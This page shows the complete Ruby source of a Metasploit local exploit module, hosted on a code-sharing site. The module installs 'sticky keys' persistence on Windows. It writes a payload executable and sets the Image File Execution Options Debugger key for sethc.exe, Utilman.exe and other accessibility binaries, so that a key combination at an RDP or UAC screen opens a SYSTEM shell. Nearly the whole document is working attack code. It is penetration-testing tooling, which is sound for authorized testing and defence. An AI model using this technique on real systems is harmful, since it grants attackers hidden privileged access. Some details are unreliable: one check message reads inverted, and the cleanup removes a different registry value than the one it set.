Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/persistence/accessibility_features_debugger.rb
28788 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::Local::Persistence

12
  prepend Msf::Exploit::Remote::AutoCheck

13
  include Msf::Post::Windows::Registry

14
  include Msf::Post::Windows::Priv

15
  include Msf::Exploit::Deprecated

16
  moved_from 'post/windows/manage/sticky_keys'

17


18
  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'

19
  DEBUG_REG_VALUE = 'Debugger'

20


21
  def initialize(info = {})

22
    super(

23
      update_info(

24
        info,

25
        'Name' => 'Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key',

26
        'Description' => %q{

27
          This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

28
          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP

29
          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting

30
          for certain executables.

31


32
          The module options allow for this hack to be applied to:

33


34
          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),

35
          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),

36
          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),

37
          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P),

38
          NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),

39
          ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).

40


41
          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded

42
          to the target prior to running the module.

43
        },

44
        'Author' => [

45
          'OJ Reeves', # original module

46
          'h00die' # persistence mixin, narrator, atbroker, docs

47
        ],

48
        'Platform' => ['win'],

49
        'SessionTypes' => ['meterpreter', 'shell'],

50
        'References' => [

51
          ['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],

52
          ['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html'],

53
          ['URL', 'https://support.microsoft.com/en-us/windows/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a'],

54
          ['ATT&CK', Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],

55
          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],

56
          ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']

57
        ],

58
        'Targets' => [

59
          [ 'Automatic', {} ]

60
        ],

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '1995-04-24', # windows 95 release date which included first sticky keys

63
        'Notes' => {

64
          'Stability' => [CRASH_SAFE],

65
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

66
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

67
        }

68
      )

69
    )

70


71
    register_options([

72
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),

73
      OptEnum.new('BINARY', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP', 'NARRATOR', 'ATBROKER']]),

74
    ])

75
  end

76


77
  #

78
  # Returns the name of the executable to modify the debugger settings of.

79
  #

80
  def get_target_exe_name

81
    case datastore['BINARY']

82
    when 'UTILMAN'

83
      'Utilman.exe'

84
    when 'OSK'

85
      'osk.exe'

86
    when 'DISP'

87
      'DisplaySwitch.exe'

88
    when 'NARRATOR'

89
      'Narrator.exe'

90
    when 'ATBROKER'

91
      'AtBroker.exe'

92
    else

93
      'sethc.exe'

94
    end

95
  end

96


97
  #

98
  # Returns the key combinations required to invoke the exploit once installed.

99
  #

100
  def get_target_key_combo

101
    case datastore['BINARY']

102
    when 'UTILMAN'

103
      'WINDOWS+U'

104
    when 'OSK'

105
      'WINDOWS+U, then launching the on-screen keyboard'

106
    when 'DISP'

107
      'WINDOWS+P'

108
    when 'NARRATOR'

109
      'WINDOWS+CTR+ENTER'

110
    when 'ATBROKER'

111
      'Launching accessibility features from the login screen (such as WINDOWS+CTR+ENTER)'

112
    else

113
      'SHIFT 5 times'

114
    end

115
  end

116


117
  #

118
  # Returns the full path to the target's registry key based on the current target

119
  # settings.

120
  #

121
  def get_target_exe_reg_key

122
    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"

123
  end

124


125
  def writable_dir

126
    d = super

127
    return session.sys.config.getenv(d) if d.start_with?('%')

128


129
    d

130
  end

131


132
  def check

133
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value

134
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

135


136
    return CheckCode::Safe('You have admin rights to run this Module') unless is_admin?

137


138
    CheckCode::Appears('Likely exploitable')

139
  end

140


141
  def install_persistence

142
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))

143
    temp_path = writable_dir

144
    payload_exe = generate_payload_exe

145
    payload_pathname = temp_path + '\\' + payload_name + '.exe'

146
    vprint_status("Payload pathname: #{payload_pathname}")

147
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

148
    target_key = get_target_exe_reg_key

149
    registry_createkey(target_key)

150
    registry_setvaldata(target_key, DEBUG_REG_VALUE, payload_pathname, 'REG_SZ')

151


152
    print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")

153
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"

154
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"#{target_key}\" /v GlobalFlag /f\" -H\n"

155
  end

156
end

157


158